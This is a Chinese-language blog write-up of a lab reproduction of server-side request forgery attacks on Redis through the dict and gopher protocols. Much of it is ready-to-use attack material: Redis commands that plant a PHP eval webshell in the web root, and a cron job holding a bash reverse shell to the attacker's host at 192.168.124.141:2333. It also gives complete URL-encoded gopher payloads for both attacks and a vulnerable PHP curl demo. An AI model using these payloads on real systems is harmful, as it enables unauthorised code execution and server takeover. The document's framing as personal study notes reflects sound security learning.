SSRF之利用dict和gopher吊打Redis

Zh1z3ven發表於2020-12-30

SSRF之利用dict和gopher吊打Redis

寫在前面

SSRF打Redis也是老生常談的東西了,這裡復現學習一下之前在xz看到某師傅寫的關於SSRF利用dict和gopher打內網服務的文章,主要是對webshell和sshkey的寫入進行復現,做一點小筆記。

準備環境

centos:有計劃任務服務、redis4.x版本

kali:作為攻擊機,模擬vps

物理機:phpstudy+ssrf.php

redis4.x下載

wget http://download.redis.io/releases/redis-4.0.11.tar.gz
$ tar xzf redis-4.0.11.tar.gz
$ cd redis-4.0.11
$ make

# centos需要提權安裝make和gcc依賴包
yum install make 
yum install gcc

SSRF漏洞程式碼

網上找了一份demo

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
?>

探測漏洞

首先驗證SSRF是否存在,可以通過獲取遠端伺服器上的一些資源(比如圖片),看看響應包是否能抓到,如果目標機能出網直接DNSLOG就能拿到真實IP。

(當然用dict協議也可以)

GET /ssrf/ssrf.php?url=http://clmppw.dnslog.cn  HTTP/1.1

Host: 192.168.124.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

image-20201223173341976

dict協議利用

dict進行埠探測

抓包將埠那裡設為要爆破的引數

image-20201223173904530

可以事先準備個埠字典,根據Length升序即可

image-20201223174301327

dict打Redis之寫webshell

先INFO探測是否設定口令,比如下圖提示就是有的

image-20201223175106039

照樣可以Inturder模組爆破去,注意用 : 代替 空格

image-20201223175332175

注意變數後面與 HTTP/1.1 一定要有空格

image-20201223175612826

更改rdb檔案的目錄至網站目錄下

url=dict://192.168.124.153:6380/config:set:dir:/var/www/html

image-20201223180102180

image-20201223180202048

將rdb檔名dbfilename改為webshell的名字

url=dict://192.168.124.153:6380/config:set:dbfilename:webshell.php

image-20201223181014473

image-20201223181051967

如果存在payload被轉義或有過濾情況,可利用16進位制,寫入webshell

GET /ssrf/ssrf.php?url=dict://192.168.124.153:6380/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x20\x3f\x3e" 

image-20201223182111091

清空一下資料, 試試寫一句話能不能連上

GET /ssrf/ssrf.php?url=dict://192.168.124.153:6380/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x27\x63\x6d\x64\x27\x5d\x29\x3b\x20\x3f\x3e"

image-20201223182344439

靶機redis有成功寫入,注意最後寫save重新整理快取。

image-20201223182404919

蟻劍連線

image-20201223204150542

dict打Redis之計劃任務反彈shell

因為利用redis去ubuntu寫總會有很多玄學問題,這裡就用上面準備的centos的redis環境。

set 1 '\n\n*/1 * * * * root /bin/bash -i >& /dev/tcp/ip/port 0>&1\n\n'

轉換一下即:
url=dict://192.168.124.153:6380/set:shell:"\n\n\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20root\x20/bin/bash\x20\x2di\x20\x3e\x26\x20/dev/tcp/192.168.124.141/2333\x200\x3e\x261\n\n"
但還要注意這裡不能夠這麼寫:\x5c 而應該直接就 \n,也不要寫\r\n 因為linux換行符就是\n你寫\r反而可能會出現引數汙染

image-20201230225238747

gopher協議利用

gopher寫入webshell

這裡利用sec_tools生成gopher協議的payload

工具:https://github.com/firebroo/sec_tools/tree/master/

使用方法:

redis.cmd寫入攻擊所需的redis指令

image-20201229161117660

執行 redis-over-gopher.py 得到payload

image-20201229161259613

根據目標資訊把ip和port換一下即可

如果這裡使用的是curl命令(比如在命令列curl + gopher)url編碼一次即可。也就是用下面的payload就可以

gopher://192.168.124.153:6380/_%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%31%33%0d%0a%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%31%33%0d%0a%73%68%65%6c%6c%5f%73%65%63%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a

如果是web端的引數有ssrf,需要url編碼兩次才可以打進去,只編碼一次時 會作為干擾使得後面payload打不進去。編碼時只把特殊符號編碼即可,如下:

gopher://192.168.124.153:6380/_%252a%2531%250d%250a%2524%2538%250d%250a%2566%256c%2575%2573%2568%2561%256c%256c%250d%250a%252a%2534%250d%250a%2524%2536%250d%250a%2563%256f%256e%2566%2569%2567%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2533%250d%250a%2564%2569%2572%250d%250a%2524%2531%2533%250d%250a%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%250d%250a%252a%2534%250d%250a%2524%2536%250d%250a%2563%256f%256e%2566%2569%2567%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2531%2530%250d%250a%2564%2562%2566%2569%256c%2565%256e%2561%256d%2565%250d%250a%2524%2531%2533%250d%250a%2573%2568%2565%256c%256c%255f%2573%2565%2563%252e%2570%2568%2570%250d%250a%252a%2533%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2538%250d%250a%2577%2565%2562%2573%2568%2565%256c%256c%250d%250a%2524%2531%2538%250d%250a%253c%253f%2570%2568%2570%2520%2570%2568%2570%2569%256e%2566%256f%2528%2529%253b%253f%253e%250d%250a%252a%2531%250d%250a%2524%2534%250d%250a%2573%2561%2576%2565%250d%250a

寫入成功。

image-20201229163050072

gopher定時任務反彈shell

關於定時任務:

centos: 在/var/spool/cron/root 或 /etc/crontab

ubuntu: 在/var/spool/cron/crontabs/root 或 /etc/crontab

Ubuntu這個計劃任務吧,利用redis寫入總會出現問題,這裡使用centos的環境。

與dict打redis類似先將彈shell語句寫入 redis.cmd

flushall
config set dir /var/spool/cron
config set dbfilename root
set shell "\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.124.
141/2333 0>&1\n\n"
save

執行redis-over-gopher.py生成payload,更改payload中的ip和port

image-20201230212627624

gopher://192.168.124.128:6380/_%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%31%35%0d%0a%2f%76%61%72%2f%73%70%6f%6f%6c%2f%63%72%6f%6e%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%34%0d%0a%72%6f%6f%74%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%35%0d%0a%73%68%65%6c%6c%0d%0a%24%36%30%0d%0a%5c%6e%5c%6e%2a%2f%31%20%2a%20%2a%20%2a%20%2a%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%32%34%2e%31%34%31%20%30%3e%26%31%5c%6e%5c%6e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a

同樣的,如果不是利用curl的話,直接打需要再次url編碼。

gopher://192.168.124.128:6380/_%252a%2531%250d%250a%2524%2538%250d%250a%2566%256c%2575%2573%2568%2561%256c%256c%250d%250a%252a%2534%250d%250a%2524%2536%250d%250a%2563%256f%256e%2566%2569%2567%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2533%250d%250a%2564%2569%2572%250d%250a%2524%2531%2535%250d%250a%252f%2576%2561%2572%252f%2573%2570%256f%256f%256c%252f%2563%2572%256f%256e%250d%250a%252a%2534%250d%250a%2524%2536%250d%250a%2563%256f%256e%2566%2569%2567%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2531%2530%250d%250a%2564%2562%2566%2569%256c%2565%256e%2561%256d%2565%250d%250a%2524%2534%250d%250a%2572%256f%256f%2574%250d%250a%252a%2533%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2535%250d%250a%2573%2568%2565%256c%256c%250d%250a%2524%2536%2530%250d%250a%25%5c%256e%25%5c%256e%252a%252f%2531%2520%252a%2520%252a%2520%252a%2520%252a%2520%2562%2561%2573%2568%2520%252d%2569%2520%253e%2526%2520%252f%2564%2565%2576%252f%2574%2563%2570%252f%2531%2539%2532%252e%2531%2536%2538%252e%2531%2532%2534%252e%2531%2534%2531%2520%2530%253e%2526%2531%25%5c%256e%25%5c%256e%250d%250a%252a%2531%250d%250a%2524%2534%250d%250a%2573%2561%2576%2565%250d%250a

image-20201230232956269

參考文章

https://xz.aliyun.com/t/8613

https://www.cnblogs.com/sijidou/p/13681845.html

相關文章